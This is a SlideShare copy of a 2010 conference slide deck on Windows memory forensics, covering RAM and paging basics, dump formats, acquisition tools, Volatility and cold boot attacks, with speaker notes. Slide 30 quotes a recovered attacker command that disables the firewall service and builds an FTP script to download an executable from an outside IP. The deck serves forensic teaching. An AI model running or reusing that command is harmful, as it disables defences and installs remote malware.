SlideShare a Scribd company logo

Memory Forensics

Prince Boonlia, profile picture
Prince Boonlia

The document provides a detailed overview of memory forensics, including concepts related to live and dead memory, memory management, and processes for analyzing memory dumps. It discusses the architecture of RAM, memory protection, and the differences between user and kernel modes, along with key tools and techniques for capturing and analyzing memory. Additionally, it highlights various memory formats and the importance of memory state reconstruction in forensic investigations.

EducationTechnology
Related topics:
Memory ManagementDigital Forensics
1 of 31
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
Shri Memory Forensics Boonlia Prince Komal Don’t pull the Plug Gmail : boonlia@gmail.com Facebook: http://www.facebook.com/home.php?#!/profile.php?id=1701055902 or search for my mail id boonliasecurity@gmail.com Twitter: http://twitter.com/boonlia
Memory Forensics
Live/ Dead Memory Forensics • What is Live Memory and what is Dead Memory – RAM – Pagefile – Hibernation file Hard Drive Live Memory Forensics Where is Hibernation file?
Few Basics of RAM • A grid of Capacitors (DRAM) • Bucket with holes • Random Access • Parity Bit for error reporting
A Grid of Capacitors Row Select: Set to high for the related row Column Select: Set to high for related column Read write line set to high for read and low for write Data inflow or outflow depending upon the R/W state Address Bus: Carries the Address of memory location Data Bus: Carries the data in and out through the same wires (Read/Write bus or simply Data Bus)
Bucket with whole (DRAM) Capacitors by their very nature gets discharged rapidly Any read write operation adds to these capacitors being discharged This calls for regular refreshing where in the entire data is read and written back SRAM Uses transistors (2-4) per bit to show on or off state per bit
Memory Address space Byte Addressable Memory (Reads 8 bits at a time) 32 Bit Processor 64 Bit Processor 2^32 2^64 4 GB 17 Billion GB 40 Bit implementation 50 Bit implementation 1024 GB 1024 TB
Memory management at a glance Processor Memory Manager Application DMA ?
Need For a Memory Manager Protect Operating system and Kernel Memory Space Prevent Application violations (Accessing other application's Memory) Allocate memory judiciously Allow Multiple applications to co-exists Improve Memory utilization efficiency Extend the Memory capacity via swapping Provide Application a simpler platform to use memory (Virtual memory Space) You dont have to create two programs for 1 GB and 2 GB RAM machines Managing the shared memory
User mode v/s kernel Mode • Memory protection • Location of both the modes in RAM • /3GB switch in boot.ini • Where the Page directory and Page Table entries are stored • What if User mode needs to access something in Kernel Mode
User Mode V/s Kernel Mode Memory
Kernel Mode Location of Page table and Page Directory User Mode 4GB Space 4GB Space Without With PAE PAE
Overview of Virtual Memory Management on X86 Processor TLB Transaction lookaside buffer
Memory management in windows Windows on 32 Bit X86 Architecture can access upto 4 GB Memory Windows can provide 4GB of memory space each to multiprocesses despite the total memory being 4 GB max This is done by using the X86 feature called paging Every Memory page is 4KB
Virtual memory to physical memory
The Paging Process in x86 processor Image source: technet.microsoft.com
Few Concepts in Windows Memory Management Process Memory Usage Counters Virtual Size Private Byte Counter Working Set Physical Memory (Say 1GB) Private Bytes Working Set Virtual 2 GB Size Shared Memory
Page lists in Windows (Dont confuse with page table) 1) Zero Page list Pages that carries no data and are ready to be assigned to a process 3) Free Page list Pages not being used by any process and free but still contains data 2) Standby Page list Unmodified Pages that are taken away from a process 4) Modified Page list Modified pages pertaining to a process taken away from that process
Windows Memory Management at a Glance Process Page Working set ve d File Modified a ded ns t a & N ee Page U a 1 M odified D Boot P ages List Sa ve d da ta Hard 2 Drive U nm o dified page s nee Zero d ed Standby Page 3 Me List mo List ry no lon g er n eed ed Free Page n List Exceeding memory use or memory crunch situation in red font
Memory Management in OS • Memory Manager – Large address space - user programs can reference more memory than physically exists – Protection - the memory for a process is private and cannot be read or modified by another process; also, the memory manager prevents processes from overwriting code and read-only-data. – Memory Mapping - clients can map a file into an area of virtual memory and access the file as memory – Fair Access to Physical Memory - the memory manager ensures that processes all have fair access to the machine's memory resources, thus ensuring reasonable system performance – Shared Memory - the memory manager allows processes to share some portion of their memory. For example, executable code is usually shared amongst processes.
What can be found in memory • The running processes • The Running threads • The passwords/ Keys and other information • Live registry hives • Live chats and login informations • Malware presence including rootkits • Open connections to the net / Network • Open Files and their remnants • . • . • In fact any thing that processor works upon
The Process of Memory forensics • Capture the memory • Analyze the memory • Reconstruction of the memory state • Reconstruction of the entire scenario with disk image and memory image in conjunction
Various formats • Raw Dump (Linear format) (.img/.dd) • Windows Crash dump format (.bin) – BSoD (Written after the system is frozen) • Hiberfil.sys format • Commercial tools format – Winen .E01 kind of format – .Vmem (Vmware) – .Bin (Hyper V) – Fastdump Pro (hpak)
Capturing the memory • Tools – DD / DCFLDD/ DC3DD • dd if=.PhysicalMemory of=f:memory.img – Memdump – Win32dd – Nigilant32 – Fastdump (Fastdump pro dumps page file content too) – MDD – Winen (Encase) – Memoryze (Dumps the pagefile content too) – Livekd.exe (From microsoft)
Brief demo on memory acquisition with win32dd
Hardware approach • Firewire port device (DMA) • http://www.storm.net.nz/projects/16 • PCI Device by Brian Carrier and Joe Grand – Tribble Device
Analysing the memory dump • String search with strings.exe • Grep search with grep command • DFRWS 2005 (Memparser) • 2007: Aaron Walters- Volatility frmework • Several Plugins for Volatiltiy • Pdfbook, Pdgmail, Pdymail, Skypeeks • Memparser • Memoryzer and Audit Viewer
Volatility Framework What is volatility Volatility plugins Using volatility on memory dumps Demo with few options for analysis
Cold Boot Attack • Memory doesn’t gets empty that fast • Even after 30 Seconds to even minutes of system shutdown the memory contains data • This Time can be prolonged if the memory is cooled down. The coolant applied instantly reduce the temperature of -50
Case Study Shell C:windowssystem32cmd.exe /c net1 stop sharedaccess&echo open 111.67.192.11> cmd.txt&echo chajian>> cmd.txt&echo 123>> cmd.txt&echo binary>>cmd.txt&echo get seo.exe>>…………..
Gmail : boonlia@gmail.com Facebook: http://www.facebook.com/home.php?#!/profile.php?id=1701055902 You can reach us at or search for my mail id boonliasecurity@gmail.com Twitter: http://twitter.com/#!/boonlia boonlia@gmail.com bhansalireena@gmail.com http://nullcon.net nullcon Goa 2010

More Related Content

PPTX
Linux System Programming - File I/O
YourHelper1
 
PPTX
Windows 7 forensics jump lists-rv3-public
CTIN
 
PPTX
Memory forensics
Sunil Kumar
 
PDF
New Ways to Find Latency in Linux Using Tracing
ScyllaDB
 
DOC
Active directory dns
palashghosh123
 
PDF
Linux Programming
Emertxe Information Technologies Pvt Ltd
 
PPTX
Memory Management in Windows 7
Naveed Qadri
 
PPTX
Firewall
Shivank Shah
 
Linux System Programming - File I/O
YourHelper1
 
Windows 7 forensics jump lists-rv3-public
CTIN
 
Memory forensics
Sunil Kumar
 
New Ways to Find Latency in Linux Using Tracing
ScyllaDB
 
Active directory dns
palashghosh123
 
Linux Programming
Emertxe Information Technologies Pvt Ltd
 
Memory Management in Windows 7
Naveed Qadri
 
Firewall
Shivank Shah
 

What's hot (20)

PPTX
eMMC Embedded Multimedia Card overview
VijayGESYS
 
PPTX
Windows memory management
Tech_MX
 
PDF
Linux Kernel - Virtual File System
Adrian Huang
 
PPT
Ipc in linux
Dr. C.V. Suresh Babu
 
PPTX
Linux SD/MMC device driver
艾鍗科技
 
PDF
Hardware-assisted Isolated Execution Environment to run trusted OS and applic...
Kuniyasu Suzaki
 
PPT
Firewall
Amuthavalli Nachiyar
 
PDF
Intel DPDK Step by Step instructions
Hisaki Ohara
 
PDF
Lab1-DB-Cassandra
Lilia Sfaxi
 
PDF
Network Drivers
Anil Kumar Pugalia
 
PPTX
Unix signals
Isaac George
 
PDF
QEMU in Cross building
Tetsuyuki Kobayashi
 
PDF
Interrupts
Anil Kumar Pugalia
 
PDF
Launch the First Process in Linux System
Jian-Hong Pan
 
PPT
Linux presentation
Nikhil Jain
 
PPT
Linux SD/MMC Driver Stack
Champ Yen
 
PDF
CS6701 CRYPTOGRAPHY AND NETWORK SECURITY
Kathirvel Ayyaswamy
 
PPTX
Passwords#14 - mimikatz
Benjamin Delpy
 
PDF
Part 02 Linux Kernel Module Programming
Tushar B Kute
 
PPTX
Kerberos Authentication Protocol
Bibek Subedi
 
eMMC Embedded Multimedia Card overview
VijayGESYS
 
Windows memory management
Tech_MX
 
Linux Kernel - Virtual File System
Adrian Huang
 
Ipc in linux
Dr. C.V. Suresh Babu
 
Linux SD/MMC device driver
艾鍗科技
 
Hardware-assisted Isolated Execution Environment to run trusted OS and applic...
Kuniyasu Suzaki
 
Firewall
Amuthavalli Nachiyar
 
Intel DPDK Step by Step instructions
Hisaki Ohara
 
Lab1-DB-Cassandra
Lilia Sfaxi
 
Network Drivers
Anil Kumar Pugalia
 
Unix signals
Isaac George
 
QEMU in Cross building
Tetsuyuki Kobayashi
 
Interrupts
Anil Kumar Pugalia
 
Launch the First Process in Linux System
Jian-Hong Pan
 
Linux presentation
Nikhil Jain
 
Linux SD/MMC Driver Stack
Champ Yen
 
CS6701 CRYPTOGRAPHY AND NETWORK SECURITY
Kathirvel Ayyaswamy
 
Passwords#14 - mimikatz
Benjamin Delpy
 
Part 02 Linux Kernel Module Programming
Tushar B Kute
 
Kerberos Authentication Protocol
Bibek Subedi
 
Ad

Viewers also liked (20)

PDF
Windows Memory Forensic Analysis using EnCase
Takahiro Haruyama
 
PDF
One-Byte Modification for Breaking Memory Forensic Analysis
Takahiro Haruyama
 
PDF
Next Generation Memory Forensics
Andrew Case
 
PDF
Hunting malware with volatility v2.0
Frank Boldewin
 
PPTX
Browser forensics
Prince Boonlia
 
PPT
Mac Memory Analysis with Volatility
Andrew Case
 
PDF
openioc_scan - IOC scanner for memory forensics
Takahiro Haruyama
 
PDF
SANS Forensics 2009 - Memory Forensics and Registry Analysis
mooyix
 
PPTX
Windows Registry Forensics with Volatility Framework
Kapil Soni
 
PDF
Review of QNX
Robert-Emmanuel Mayssat
 
PPTX
Malware analysis using volatility
Yashashree Gund
 
PDF
Volatile IOCs for Fast Incident Response
Takahiro Haruyama
 
PPT
nullcon 2010 - Steganography & Stegananalysis: A Technical & Psychological Pe...
n|u - The Open Security Community
 
PDF
SBC 2012 - Malware Memory Forensics (Nguyễn Chấn Việt)
Security Bootcamp
 
PPTX
Windows forensic
MD SAQUIB KHAN
 
PPTX
Windows Forensics
Prince Boonlia
 
PPTX
Advanced Malware Analysis Training Session 7 - Malware Memory Forensics
securityxploded
 
PPTX
Advanced Malware Analysis Training Session 4 - Anti-Analysis Techniques
securityxploded
 
PPTX
Advanced Malware Analysis Training Session 2 - Botnet Analysis Part 1
securityxploded
 
PPTX
Advanced Malware Analysis Training Session 1 - Detection and Removal of Malwares
securityxploded
 
Windows Memory Forensic Analysis using EnCase
Takahiro Haruyama
 
One-Byte Modification for Breaking Memory Forensic Analysis
Takahiro Haruyama
 
Next Generation Memory Forensics
Andrew Case
 
Hunting malware with volatility v2.0
Frank Boldewin
 
Browser forensics
Prince Boonlia
 
Mac Memory Analysis with Volatility
Andrew Case
 
openioc_scan - IOC scanner for memory forensics
Takahiro Haruyama
 
SANS Forensics 2009 - Memory Forensics and Registry Analysis
mooyix
 
Windows Registry Forensics with Volatility Framework
Kapil Soni
 
Review of QNX
Robert-Emmanuel Mayssat
 
Malware analysis using volatility
Yashashree Gund
 
Volatile IOCs for Fast Incident Response
Takahiro Haruyama
 
nullcon 2010 - Steganography & Stegananalysis: A Technical & Psychological Pe...
n|u - The Open Security Community
 
SBC 2012 - Malware Memory Forensics (Nguyễn Chấn Việt)
Security Bootcamp
 
Windows forensic
MD SAQUIB KHAN
 
Windows Forensics
Prince Boonlia
 
Advanced Malware Analysis Training Session 7 - Malware Memory Forensics
securityxploded
 
Advanced Malware Analysis Training Session 4 - Anti-Analysis Techniques
securityxploded
 
Advanced Malware Analysis Training Session 2 - Botnet Analysis Part 1
securityxploded
 
Advanced Malware Analysis Training Session 1 - Detection and Removal of Malwares
securityxploded
 
Ad

Similar to Memory Forensics (20)

PPTX
Introducción a los microprocesadores vi
ayreonmx
 
PDF
Memory
adil raja
 
PPTX
Virtual memory
vatsaanadi
 
PDF
Introduction handout
Learn By Watch
 
PPTX
20220621235219D5782_2 Key Technical Concepts[DONE].pptx
Valerian32
 
PPT
7th ed ppt ch07
Gene Carboni
 
PPTX
Memory_Lecture_for_ITstud_Chapter_04.pptx
ephremnokon
 
PPTX
Memory & storage devices
Hamza Mughal
 
PPTX
Malvin harding computer components presentation
malvin95
 
PPTX
Computer hardware servicing lesson 2:Perform Mensuration And Calculation
A J
 
PPTX
10 lesson4
Mary Grace Uminga
 
PPT
Transforming data into information
Maryam Fida
 
PPTX
computer hardware servicing lesson 2 ppt
RYANCENRIQUEZ
 
PPT
EPROM, PROM & ROM
Abhilash Nair
 
PPTX
CBSE Informatics Practices Chapter-11 Basic Computer Organization
FaizSSIS
 
PPTX
PC Hardware administration and Maintenance.pptx
dayananda54
 
PPTX
Week 6- PC HARDWARE AND MAINTENANCE-THEORY.pptx
dayananda54
 
PPT
Mem hierarchy
Vaibhav Bajaj
 
PPT
hgfhfghfg gvhhhgjfg gtfhngfjhfk jkfgfgjfgj
mindzyp
 
PPTX
PERFORM CALCULATION AND MENSURATION.pptx
EchelleOgatis
 
Introducción a los microprocesadores vi
ayreonmx
 
Memory
adil raja
 
Virtual memory
vatsaanadi
 
Introduction handout
Learn By Watch
 
20220621235219D5782_2 Key Technical Concepts[DONE].pptx
Valerian32
 
7th ed ppt ch07
Gene Carboni
 
Memory_Lecture_for_ITstud_Chapter_04.pptx
ephremnokon
 
Memory & storage devices
Hamza Mughal
 
Malvin harding computer components presentation
malvin95
 
Computer hardware servicing lesson 2:Perform Mensuration And Calculation
A J
 
10 lesson4
Mary Grace Uminga
 
Transforming data into information
Maryam Fida
 
computer hardware servicing lesson 2 ppt
RYANCENRIQUEZ
 
EPROM, PROM & ROM
Abhilash Nair
 
CBSE Informatics Practices Chapter-11 Basic Computer Organization
FaizSSIS
 
PC Hardware administration and Maintenance.pptx
dayananda54
 
Week 6- PC HARDWARE AND MAINTENANCE-THEORY.pptx
dayananda54
 
Mem hierarchy
Vaibhav Bajaj
 
hgfhfghfg gvhhhgjfg gtfhngfjhfk jkfgfgjfgj
mindzyp
 
PERFORM CALCULATION AND MENSURATION.pptx
EchelleOgatis
 

Recently uploaded (20)

PDF
ANTIBIOTICS.pptx.pdf………………… xxxxxxxxxxxxx
HakHe
 
PPTX
PPH.pptx obstetrics and gynecology in nursing
SrideviDevaraj5
 
PDF
Computing-Curriculum for Schools in Ghana
abigailanane203
 
PDF
Sports Quiz easy sports quiz sports quiz
nikunj2757
 
PPTX
1st Inaugural Professorial Lecture held on 19th February 2020 (Governance and...
kawisojames10
 
PPTX
PPT- ENG7_QUARTER1_LESSON1_WEEK1. IMAGERY -DESCRIPTIONS pptx.pptx
KMDee
 
PDF
O5-L3 Freight Transport Ops (International) V1.pdf
labyankof
 
PDF
2.FourierTransform-ShortQuestionswithAnswers.pdf
Raji Murugan
 
PPTX
Pharmacology of Heart Failure /Pharmacotherapy of CHF
Rajshri Ghogare
 
PPTX
school management -TNTEU- B.Ed., Semester II Unit 1.pptx
NihumathunnisaH
 
PDF
3rd Neelam Sanjeevareddy Memorial Lecture.pdf
Academy of Grassroots Studies and Research of India (AGRASRI)
 
PDF
Basic Mud Logging Guide for educational purpose
wdandworks
 
PDF
Anesthesia in Laparoscopic Surgery in India
mohitsuren827
 
PPTX
Cell Types and Its function , kingdom of life
ClaireMangundayao1
 
PDF
STATICS OF THE RIGID BODIES Hibbelers.pdf
pascualasturiaskaye4
 
PDF
Insiders guide to clinical Medicine.pdf
AbhishekPatil315128
 
PPTX
Cell Structure & Organelles in detailed.
DHANASHREESIVAKUMAR
 
PPTX
master seminar digital applications in india
ananyaray35
 
PDF
Pre independence Education in Inndia.pdf
goofy5603
 
PPTX
Institutional Correction lecture only . . .
limvtheghins
 
ANTIBIOTICS.pptx.pdf………………… xxxxxxxxxxxxx
HakHe
 
PPH.pptx obstetrics and gynecology in nursing
SrideviDevaraj5
 
Computing-Curriculum for Schools in Ghana
abigailanane203
 
Sports Quiz easy sports quiz sports quiz
nikunj2757
 
1st Inaugural Professorial Lecture held on 19th February 2020 (Governance and...
kawisojames10
 
PPT- ENG7_QUARTER1_LESSON1_WEEK1. IMAGERY -DESCRIPTIONS pptx.pptx
KMDee
 
O5-L3 Freight Transport Ops (International) V1.pdf
labyankof
 
2.FourierTransform-ShortQuestionswithAnswers.pdf
Raji Murugan
 
Pharmacology of Heart Failure /Pharmacotherapy of CHF
Rajshri Ghogare
 
school management -TNTEU- B.Ed., Semester II Unit 1.pptx
NihumathunnisaH
 
3rd Neelam Sanjeevareddy Memorial Lecture.pdf
Academy of Grassroots Studies and Research of India (AGRASRI)
 
Basic Mud Logging Guide for educational purpose
wdandworks
 
Anesthesia in Laparoscopic Surgery in India
mohitsuren827
 
Cell Types and Its function , kingdom of life
ClaireMangundayao1
 
STATICS OF THE RIGID BODIES Hibbelers.pdf
pascualasturiaskaye4
 
Insiders guide to clinical Medicine.pdf
AbhishekPatil315128
 
Cell Structure & Organelles in detailed.
DHANASHREESIVAKUMAR
 
master seminar digital applications in india
ananyaray35
 
Pre independence Education in Inndia.pdf
goofy5603
 
Institutional Correction lecture only . . .
limvtheghins
 

Memory Forensics

  • 1. Shri Memory Forensics Boonlia Prince Komal Don’t pull the Plug Gmail : boonlia@gmail.com Facebook: http://www.facebook.com/home.php?#!/profile.php?id=1701055902 or search for my mail id boonliasecurity@gmail.com Twitter: http://twitter.com/boonlia
  • 3. Live/ Dead Memory Forensics • What is Live Memory and what is Dead Memory – RAM – Pagefile – Hibernation file Hard Drive Live Memory Forensics Where is Hibernation file?
  • 4. Few Basics of RAM • A grid of Capacitors (DRAM) • Bucket with holes • Random Access • Parity Bit for error reporting
  • 5. A Grid of Capacitors Row Select: Set to high for the related row Column Select: Set to high for related column Read write line set to high for read and low for write Data inflow or outflow depending upon the R/W state Address Bus: Carries the Address of memory location Data Bus: Carries the data in and out through the same wires (Read/Write bus or simply Data Bus)
  • 6. Bucket with whole (DRAM) Capacitors by their very nature gets discharged rapidly Any read write operation adds to these capacitors being discharged This calls for regular refreshing where in the entire data is read and written back SRAM Uses transistors (2-4) per bit to show on or off state per bit
  • 7. Memory Address space Byte Addressable Memory (Reads 8 bits at a time) 32 Bit Processor 64 Bit Processor 2^32 2^64 4 GB 17 Billion GB 40 Bit implementation 50 Bit implementation 1024 GB 1024 TB
  • 8. Memory management at a glance Processor Memory Manager Application DMA ?
  • 9. Need For a Memory Manager Protect Operating system and Kernel Memory Space Prevent Application violations (Accessing other application's Memory) Allocate memory judiciously Allow Multiple applications to co-exists Improve Memory utilization efficiency Extend the Memory capacity via swapping Provide Application a simpler platform to use memory (Virtual memory Space) You dont have to create two programs for 1 GB and 2 GB RAM machines Managing the shared memory
  • 10. User mode v/s kernel Mode • Memory protection • Location of both the modes in RAM • /3GB switch in boot.ini • Where the Page directory and Page Table entries are stored • What if User mode needs to access something in Kernel Mode
  • 11. User Mode V/s Kernel Mode Memory
  • 12. Kernel Mode Location of Page table and Page Directory User Mode 4GB Space 4GB Space Without With PAE PAE
  • 13. Overview of Virtual Memory Management on X86 Processor TLB Transaction lookaside buffer
  • 14. Memory management in windows Windows on 32 Bit X86 Architecture can access upto 4 GB Memory Windows can provide 4GB of memory space each to multiprocesses despite the total memory being 4 GB max This is done by using the X86 feature called paging Every Memory page is 4KB
  • 15. Virtual memory to physical memory
  • 16. The Paging Process in x86 processor Image source: technet.microsoft.com
  • 17. Few Concepts in Windows Memory Management Process Memory Usage Counters Virtual Size Private Byte Counter Working Set Physical Memory (Say 1GB) Private Bytes Working Set Virtual 2 GB Size Shared Memory
  • 18. Page lists in Windows (Dont confuse with page table) 1) Zero Page list Pages that carries no data and are ready to be assigned to a process 3) Free Page list Pages not being used by any process and free but still contains data 2) Standby Page list Unmodified Pages that are taken away from a process 4) Modified Page list Modified pages pertaining to a process taken away from that process
  • 19. Windows Memory Management at a Glance Process Page Working set ve d File Modified a ded ns t a & N ee Page U a 1 M odified D Boot P ages List Sa ve d da ta Hard 2 Drive U nm o dified page s nee Zero d ed Standby Page 3 Me List mo List ry no lon g er n eed ed Free Page n List Exceeding memory use or memory crunch situation in red font
  • 20. Memory Management in OS • Memory Manager – Large address space - user programs can reference more memory than physically exists – Protection - the memory for a process is private and cannot be read or modified by another process; also, the memory manager prevents processes from overwriting code and read-only-data. – Memory Mapping - clients can map a file into an area of virtual memory and access the file as memory – Fair Access to Physical Memory - the memory manager ensures that processes all have fair access to the machine's memory resources, thus ensuring reasonable system performance – Shared Memory - the memory manager allows processes to share some portion of their memory. For example, executable code is usually shared amongst processes.
  • 21. What can be found in memory • The running processes • The Running threads • The passwords/ Keys and other information • Live registry hives • Live chats and login informations • Malware presence including rootkits • Open connections to the net / Network • Open Files and their remnants • . • . • In fact any thing that processor works upon
  • 22. The Process of Memory forensics • Capture the memory • Analyze the memory • Reconstruction of the memory state • Reconstruction of the entire scenario with disk image and memory image in conjunction
  • 23. Various formats • Raw Dump (Linear format) (.img/.dd) • Windows Crash dump format (.bin) – BSoD (Written after the system is frozen) • Hiberfil.sys format • Commercial tools format – Winen .E01 kind of format – .Vmem (Vmware) – .Bin (Hyper V) – Fastdump Pro (hpak)
  • 24. Capturing the memory • Tools – DD / DCFLDD/ DC3DD • dd if=.PhysicalMemory of=f:memory.img – Memdump – Win32dd – Nigilant32 – Fastdump (Fastdump pro dumps page file content too) – MDD – Winen (Encase) – Memoryze (Dumps the pagefile content too) – Livekd.exe (From microsoft)
  • 25. Brief demo on memory acquisition with win32dd
  • 26. Hardware approach • Firewire port device (DMA) • http://www.storm.net.nz/projects/16 • PCI Device by Brian Carrier and Joe Grand – Tribble Device
  • 27. Analysing the memory dump • String search with strings.exe • Grep search with grep command • DFRWS 2005 (Memparser) • 2007: Aaron Walters- Volatility frmework • Several Plugins for Volatiltiy • Pdfbook, Pdgmail, Pdymail, Skypeeks • Memparser • Memoryzer and Audit Viewer
  • 28. Volatility Framework What is volatility Volatility plugins Using volatility on memory dumps Demo with few options for analysis
  • 29. Cold Boot Attack • Memory doesn’t gets empty that fast • Even after 30 Seconds to even minutes of system shutdown the memory contains data • This Time can be prolonged if the memory is cooled down. The coolant applied instantly reduce the temperature of -50
  • 30. Case Study Shell C:windowssystem32cmd.exe /c net1 stop sharedaccess&echo open 111.67.192.11> cmd.txt&echo chajian>> cmd.txt&echo 123>> cmd.txt&echo binary>>cmd.txt&echo get seo.exe>>…………..
  • 31. Gmail : boonlia@gmail.com Facebook: http://www.facebook.com/home.php?#!/profile.php?id=1701055902 You can reach us at or search for my mail id boonliasecurity@gmail.com Twitter: http://twitter.com/#!/boonlia boonlia@gmail.com bhansalireena@gmail.com http://nullcon.net nullcon Goa 2010

Editor's Notes

  • #2: Who am I What has been written in forensics book is “Pull the plug” Things changed post 2005
  • #12: Check that device drivers are in kernel mode and therefore inside protection. A wrong driver may cause BSoD cause it manipultes memory in kernel Mode
  • #15: 32 pin with can specify upto 4 GB of addresses with 2^32 options
  • #16: 2 level structure. 1024 X 1024 X 4KB page Every Process has :- PDE structure (Every entry has 20 bits to point to Page table number and 12 bits for page protection and other house keeping) PTE Structure (Every entry has 20 bits to point to 4 KB page (total 1024 X4KB pages and 12 bits for house keeping) PFN (Page Frame number is the 4 KB frame in memory) Processor uses 10 bits to find PDE, 10 Bits to find PTE and 12 bits to identify individial bit in 4 KB page
  • #24: Crash dump: Good for analysis, Dumped with frozen state of windows, Debugging tools available from microsoft Cons: Writes on the hard drive, By default only windows 2003 dumps full memory. (Small 64KB dump, Kernel dump and full dump) Possiblity to force dump only with registry tweak and after the system is restarted post registry tweak full dump available only with the system with upto 2 GB of RAM Content of pagefile are over written as the dump first freezes the system, dumps the RAM in pagefile and then proceeds to Winen: Propreitory format from encase. Can be converted to other formats includng Raw format with FTK imager from access data Vmem: Virtual machine can be suspended and perfect image stored in Vmem. Format similar to raw and same tools used to parse it .Bin: a dump format from windows Hibernation file: Compressed, File format revealed by Mattihieu Suiche fo Sandman (Now part of volatility) Can be used as memory dump. U can use it as additional dump and compare with current dump
  • #25: Memory is dynamic so try to stop all other activities while performing the capture What do you get….RAM or RAM+Pagefile
  • #27: Fireport device: Extremely fast due to DMA (Bypass OS) Storm.net.nz project. A software driver that can be used and installed in backtrack and other packages fools the windows os that it is an Ipod. Not very successful Blue Screen of Death reported Misses few parts of the memory Tribble needs to be installed in the machine prior to incident All in all not much of success on hardware front……Still on most part only softwares are used for memory dumping that might in fact rely on DLL already compromised on the system.
  • #28: Strings and Grep: Raw searches and doesn’t provide the full context in which that string is used. Memeparser win DFRWS (Digital forensics research workshops) 2005 challenge Voaltility